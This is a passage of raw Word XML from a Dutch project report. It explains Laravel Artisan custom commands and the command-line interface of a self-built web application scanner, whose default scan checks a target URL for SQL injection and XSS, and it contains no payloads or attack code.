        <w:t xml:space="preserve">Hiermee kunnen </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A42BD7">
        <w:t>Custom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A42BD7">
        <w:t xml:space="preserve"> (op maat gemaakt) commando’</w:t>
      </w:r>
      <w:r w:rsidR="005E20A1">
        <w:t>s gedefinieerd</w:t>
      </w:r>
      <w:r w:rsidR="00A42BD7">
        <w:t xml:space="preserve"> worden.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECDDB0E" w14:textId="2593F1BA" w:rsidR="001A461B" w:rsidRDefault="00234E69">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="252000256" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2D51978A" wp14:editId="5C3CC865">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-10795</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>174625</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3839845" cy="218440"/>
            <wp:effectExtent l="0" t="0" r="0" b="10160"/>
            <wp:wrapTopAndBottom/>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custom scan.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId47">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3839845" cy="218440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00A54861">
        <w:t xml:space="preserve">Voorbeeld van de </w:t>
      </w:r>
      <w:r w:rsidR="004A385F">
        <w:t>commando:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1E9386" w14:textId="77777777" w:rsidR="005D5A7A" w:rsidRDefault="00DD5244">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251968512" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="502A7B56" wp14:editId="6A6569D4">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2912745</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>314325</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3556635" cy="317500"/>
            <wp:effectExtent l="25400" t="25400" r="24765" b="38100"/>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commando.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId48">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3556635" cy="3175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B33C50C" w14:textId="0F0E7691" w:rsidR="003E2805" w:rsidRDefault="00C91BB4">
      <w:r>
        <w:t>Een</w:t>
      </w:r>
      <w:r w:rsidR="00B45210">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B45210">
        <w:t>Artisan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> commando bestaat</w:t>
      </w:r>
      <w:r w:rsidR="00B45210">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>uit drie delen</w:t>
      </w:r>
      <w:r w:rsidR="00DC40BC">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA85A8E" w14:textId="6651984B" w:rsidR="003E2805" w:rsidRDefault="003E2805" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">De start commando van </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>artisan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>artisan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F5C82D" w14:textId="0C02731C" w:rsidR="00B45210" w:rsidRDefault="003E2805" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">De </w:t>
      </w:r>
      <w:r w:rsidR="00B45210">
        <w:t>actie die uitgevoerd wordt “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00B45210">
        <w:t>make:command</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00B45210">
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4E44AA" w14:textId="7A815FB4" w:rsidR="001456CE" w:rsidRDefault="005D5A7A" w:rsidP="00895A0E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="49"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251965440" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6CA21ED6" wp14:editId="602B1AD3">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2847340</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>302895</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3620770" cy="2631440"/>
            <wp:effectExtent l="0" t="0" r="11430" b="10160"/>
            <wp:wrapSquare wrapText="bothSides"/>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code=snippet.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId49">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3620770" cy="2631440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
            <wp14:sizeRelH relativeFrom="page">
              <wp14:pctWidth>0</wp14:pctWidth>
            </wp14:sizeRelH>
            <wp14:sizeRelV relativeFrom="page">
              <wp14:pctHeight>0</wp14:pctHeight>
            </wp14:sizeRelV>
          </wp:anchor>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="00B45210">
        <w:t xml:space="preserve">De waarde die de gebruiker aan </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B45210">
        <w:t>Artisan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B45210">
        <w:t xml:space="preserve"> meegeeft “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B45210">
        <w:t>CustomCommand</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B45210">
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28580E90" w14:textId="63060F2F" w:rsidR="00E605CF" w:rsidRDefault="00D82178" w:rsidP="001456CE">
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-GB" w:eastAsia="en-GB"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251967488" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="007B4173" wp14:editId="6442053D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2847975</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2604135</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="572135" cy="177800"/>
                <wp:effectExtent l="0" t="0" r="12065" b="0"/>
                <wp:wrapThrough wrapText="bothSides">
                  <wp:wrapPolygon edited="0">
                    <wp:start x="0" y="0"/>
                    <wp:lineTo x="0" y="18514"/>
                    <wp:lineTo x="21097" y="18514"/>
                    <wp:lineTo x="21097" y="0"/>
                    <wp:lineTo x="0" y="0"/>
                  </wp:wrapPolygon>
                </wp:wrapThrough>
                <wp:docPr id="213" name="Text Box 213"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr txBox="1"/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="572135" cy="177800"/>
                        </a:xfrm>
                        <a:prstGeom prst="rect">
                          <a:avLst/>
                        </a:prstGeom>
                        <a:solidFill>
                          <a:prstClr val="white"/>
                        </a:solidFill>
                        <a:ln>
                          <a:noFill/>
                        </a:ln>
                        <a:effectLst/>
                      </wps:spPr>
                      <wps:txbx>
                        <w:txbxContent>
                          <w:p w14:paraId="18562E75" w14:textId="590D5740" w:rsidR="00CE4BB5" w:rsidRPr="00B86D49" w:rsidRDefault="00CE4BB5" w:rsidP="00355841">
                            <w:pPr>
                              <w:pStyle w:val="Caption"/>
                              <w:rPr>
                                <w:noProof/>
                                <w:sz w:val="20"/>
                                <w:szCs w:val="20"/>
                              </w:rPr>
                            </w:pPr>
                            <w:r>
                              <w:t>Figure 4.10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B4173" id="Text Box 213" o:spid="_x0000_s1088" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:224.25pt;margin-top:205.05pt;width:45.05pt;height:14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GtxTkCAAB5BAAADgAAAGRycy9lMm9Eb2MueG1srFRNj9owEL1X6n+wfC8BKsoqIqwoK6pKaHcl&#10;qPZsHJtYsj2ubUjor+/YIWy77anqxRnPjOfjvZks7jujyVn4oMBWdDIaUyIsh1rZY0W/7Tcf7igJ&#10;kdmaabCiohcR6P3y/btF60oxhQZ0LTzBIDaUratoE6MriyLwRhgWRuCERaMEb1jEqz8WtWctRje6&#10;mI7Hn4oWfO08cBECah96I13m+FIKHp+kDCISXVGsLebT5/OQzmK5YOXRM9cofi2D/UMVhimLSW+h&#10;Hlhk5OTVH6GM4h4CyDjiYAqQUnGRe8BuJuM33ewa5kTuBcEJ7gZT+H9h+eP52RNVV3Q6+UiJZQZJ&#10;2osuks/QkaRDhFoXSnTcOXSNHRqQ6UEfUJka76Q36YstEbQj1pcbvikcR+VsjgFnlHA0Tebzu3HG&#10;v3h97HyIXwQYkoSKeqQvo8rO2xCxEHQdXFKuAFrVG6V1uiTDWntyZkh126goUon44jcvbZOvhfSq&#10;N/cakWflmiX12/eVpNgduozQbDY0fYD6glh46OcpOL5RmH7LQnxmHgcI28eliE94SA1tReEqUdKA&#10;//E3ffJHXtFKSYsDWdHw/cS8oER/tch4mt5B8INwGAR7MmvAxie4bo5nER/4qAdRejAvuCurlAVN&#10;zHLMVdE4iOvYrwXuGherVXbCGXUsbu3O8RR6gHnfvTDvriRFZPcRhlFl5Ruuet8e9NUpglSZyARs&#10;jyJylC4435mt6y6mBfr1nr1e/xjLnwAAAP//AwBQSwMEFAAGAAgAAAAhAK5HR63gAAAACwEAAA8A&#10;AABkcnMvZG93bnJldi54bWxMj01Pg0AQhu8m/ofNmHgxdqEfhFCWRlu96aG16XnKboHIzhJ2KfTf&#10;O570Nh9P3nkm30y2FVfT+8aRgngWgTBUOt1QpeD49f6cgvABSWPryCi4GQ+b4v4ux0y7kfbmegiV&#10;4BDyGSqoQ+gyKX1ZG4t+5jpDvLu43mLgtq+k7nHkcNvKeRQl0mJDfKHGzmxrU34fBqsg2fXDuKft&#10;0+749oGfXTU/vd5OSj0+TC9rEMFM4Q+GX31Wh4Kdzm4g7UWrYLlMV4xyEUcxCCZWizQBcebJIo1B&#10;Frn8/0PxAwAA//8DAFBLAQItABQABgAIAAAAIQDkmcPA+wAAAOEBAAATAAAAAAAAAAAAAAAAAAAA&#10;AABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhACOyauHXAAAAlAEAAAsAAAAAAAAA&#10;AAAAAAAALAEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAA+xrcU5AgAAeQQAAA4AAAAAAAAA&#10;AAAAAAAALAIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAK5HR63gAAAACwEAAA8AAAAA&#10;AAAAAAAAAAAAkQQAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAACeBQAAAAA=&#10;" stroked="f">
                <v:textbox inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="18562E75" w14:textId="590D5740" w:rsidR="00CE4BB5" w:rsidRPr="00B86D49" w:rsidRDefault="00CE4BB5" w:rsidP="00355841">
                      <w:pPr>
                        <w:pStyle w:val="Caption"/>
                        <w:rPr>
                          <w:noProof/>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t>Figure 4.10</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="through"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="001456CE">
        <w:t xml:space="preserve">De commando die in figuur 4.5 wordt getoond genereerd een nieuwe </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001456CE">
        <w:t>Command</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001456CE">
        <w:t xml:space="preserve"> Class, dit is tevens ook de basis voor op maat gemaakte commando’s.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> In Figuur 4.6 toont de gemaakte </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Command</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Class.</w:t>
      </w:r>
      <w:r w:rsidR="00C85548">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A101F3">
        <w:t xml:space="preserve">Het bestaat uit twee variabels de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A101F3" w:rsidRPr="00A101F3">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>signature</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A101F3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F64F22">
        <w:t xml:space="preserve">en de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F64F22" w:rsidRPr="00F64F22">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>description</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00F64F22">
        <w:t xml:space="preserve">. De </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00F64F22" w:rsidRPr="00F64F22">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>signature</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="009D7ACE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A46E29">
        <w:t xml:space="preserve">definieert de commando, in dit geval: </w:t>
      </w:r>
      <w:r w:rsidR="00A46E29" w:rsidRPr="00A46E29">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>commando {waarde}</w:t>
      </w:r>
      <w:r w:rsidR="00A46E29">
        <w:t xml:space="preserve"> en de </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A46E29">
        <w:t>description</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A46E29">
        <w:t xml:space="preserve"> is de omschrijving van de commando. Dit wordt getoond in een lijst van commando’s wanneer de help functie van </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00A46E29">
        <w:t>Artisan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00A46E29">
        <w:t xml:space="preserve"> wordt gebruikt. Verder heeft de Class nog een handle functie die wordt uitgevoerd wanneer de commando in de CLI wordt aangeroepen. </w:t>
      </w:r>
      <w:r w:rsidR="00086D88">
        <w:t>In deze functie moet er een opdracht uitgevoerd worden met de waarde die je meegeeft</w:t>
      </w:r>
      <w:r w:rsidR="00C43D51">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CE3366B" w14:textId="77777777" w:rsidR="00DC7DAA" w:rsidRDefault="00E605CF" w:rsidP="001456CE">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidR="00DC7DAA" w:rsidRPr="00DC7DAA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>CLI van de Web Applicatie Scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1402BD8C" w14:textId="0C09B3B2" w:rsidR="00D02A68" w:rsidRDefault="00F37716" w:rsidP="001456CE">
      <w:r>
        <w:t xml:space="preserve">De CLI van de Web Applicatie Scanner </w:t>
      </w:r>
      <w:r w:rsidR="00393799">
        <w:t>hee</w:t>
      </w:r>
      <w:r w:rsidR="00D02A68">
        <w:t>ft een aantal simpele commando’s</w:t>
      </w:r>
      <w:r w:rsidR="00393799">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="007C66A9">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00393799">
        <w:t>scan</w:t>
      </w:r>
      <w:r w:rsidR="007C66A9">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidR="00D02A68">
        <w:t>, “</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00D02A68">
        <w:t>verzend</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00D02A68">
        <w:t>” en “lijst”.</w:t>
      </w:r>
      <w:r w:rsidR="0094568B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="009F4827">
        <w:t>De “scan” commando is voor de Scanner component en de twee andere, “</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="009F4827">
        <w:t>verzend</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="009F4827">
        <w:t>” en “lijst” zijn voor het beheren van rapporten.</w:t>
      </w:r>
      <w:r w:rsidR="00D02A68">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F2DEF50" w14:textId="70429226" w:rsidR="0016275D" w:rsidRPr="0016275D" w:rsidRDefault="0016275D" w:rsidP="001456CE">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0016275D">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Scannen</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DAEB228" w14:textId="35F01100" w:rsidR="00475C65" w:rsidRPr="0016275D" w:rsidRDefault="00D02A68" w:rsidP="001456CE">
      <w:r>
        <w:t>De “scan” commando accepteert</w:t>
      </w:r>
      <w:r w:rsidR="00393799">
        <w:t xml:space="preserve"> één waarde</w:t>
      </w:r>
      <w:r w:rsidR="007A2C77">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00393799">
        <w:t xml:space="preserve"> de URL van het doelwit. </w:t>
      </w:r>
      <w:r w:rsidR="0098442E">
        <w:t>Dit start een standaa</w:t>
      </w:r>
      <w:r w:rsidR="00D761D2">
        <w:t xml:space="preserve">rd scan van een </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00D761D2">
        <w:t>web applicatie</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00D761D2">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="004725E2">
        <w:t xml:space="preserve">De Web Applicatie Scanner kan twee type scans uitvoeren een </w:t>
      </w:r>
      <w:r w:rsidR="00BF3E2A">
        <w:t xml:space="preserve">standard scan en een </w:t>
      </w:r>
      <w:r w:rsidR="009369DC">
        <w:t xml:space="preserve">gemodificeerde scan. </w:t>
      </w:r>
      <w:r w:rsidR="005722E6">
        <w:t>De standaard scan voert een voor gedefinieerde scan u</w:t>
      </w:r>
      <w:r w:rsidR="00B777F4">
        <w:t>it. Bij de</w:t>
      </w:r>
      <w:r w:rsidR="005722E6">
        <w:t xml:space="preserve"> invoer van de standaard scan commando wordt er op het achtergrond optie</w:t>
      </w:r>
      <w:r w:rsidR="00941668">
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="005722E6">
        <w:t xml:space="preserve"> ingesteld (Tabel 4.10, Standaard). </w:t>
      </w:r>
      <w:r w:rsidR="00FC7C23">
        <w:t xml:space="preserve">De gemodificeerde scan, wat een scan opmaat is maakt gebruik van </w:t>
      </w:r>
      <w:r w:rsidR="00FD4D5E">
        <w:t xml:space="preserve">opties </w:t>
      </w:r>
      <w:r w:rsidR="00EF4F40">
        <w:t>om zo een scan na wens te configureren.</w:t>
      </w:r>
      <w:r w:rsidR="00D67CA9">
        <w:t xml:space="preserve"> De </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D67CA9">
        <w:t>configurabele</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D67CA9">
        <w:t xml:space="preserve"> opties w</w:t>
      </w:r>
      <w:r w:rsidR="000E3016">
        <w:t>orden in het volgende h</w:t>
      </w:r>
      <w:r w:rsidR="00D67CA9">
        <w:t>oofdstuk behandeld. (H 4.4.2)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9915" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="3045"/>
        <w:gridCol w:w="2928"/>
        <w:gridCol w:w="3942"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D070A0" w14:paraId="40186C8A" w14:textId="77777777" w:rsidTr="00D070A0">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3045" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B42A53A" w14:textId="7F7E2CCF" w:rsidR="007A59CE" w:rsidRDefault="007A59CE" w:rsidP="001456CE">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2928" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="49DA59A5" w14:textId="7C59C6B6" w:rsidR="007A59CE" w:rsidRDefault="007A59CE" w:rsidP="001456CE">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Commando</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3942" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46C9A053" w14:textId="3DB452D4" w:rsidR="007A59CE" w:rsidRDefault="007A59CE" w:rsidP="001456CE">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Omschrijving</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D070A0" w14:paraId="5DF26474" w14:textId="77777777" w:rsidTr="00D070A0">
        <w:trPr>
          <w:trHeight w:val="306"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3045" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0408C28D" w14:textId="7D291D3D" w:rsidR="007A59CE" w:rsidRPr="0087298A" w:rsidRDefault="007A59CE" w:rsidP="001456CE">
            <w:r>
              <w:t>Standaard</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2928" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="22499805" w14:textId="447476F9" w:rsidR="007A59CE" w:rsidRPr="007770B0" w:rsidRDefault="00A852C1" w:rsidP="0087298A">
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>artisan</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> scan</w:t>
            </w:r>
            <w:r w:rsidR="00A60551">
              <w:t xml:space="preserve"> {</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="00A60551">
              <w:t>url</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00A60551">
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3942" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F1C5B96" w14:textId="4753C1BC" w:rsidR="007A59CE" w:rsidRPr="007A59CE" w:rsidRDefault="00D070A0" w:rsidP="0087298A">
            <w:r>
              <w:t xml:space="preserve">Er wordt op zowel </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>SQLi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> en </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>XSS injectie</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t xml:space="preserve"> gescand</w:t>
            </w:r>
            <w:r w:rsidR="00305BE9">
              <w:t xml:space="preserve"> met voor gedefinieerde configuratie</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D070A0" w14:paraId="3FE3D51B" w14:textId="77777777" w:rsidTr="00735156">
        <w:trPr>
          <w:trHeight w:val="208"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3045" w:type="dxa"/>
          </w:tcPr>
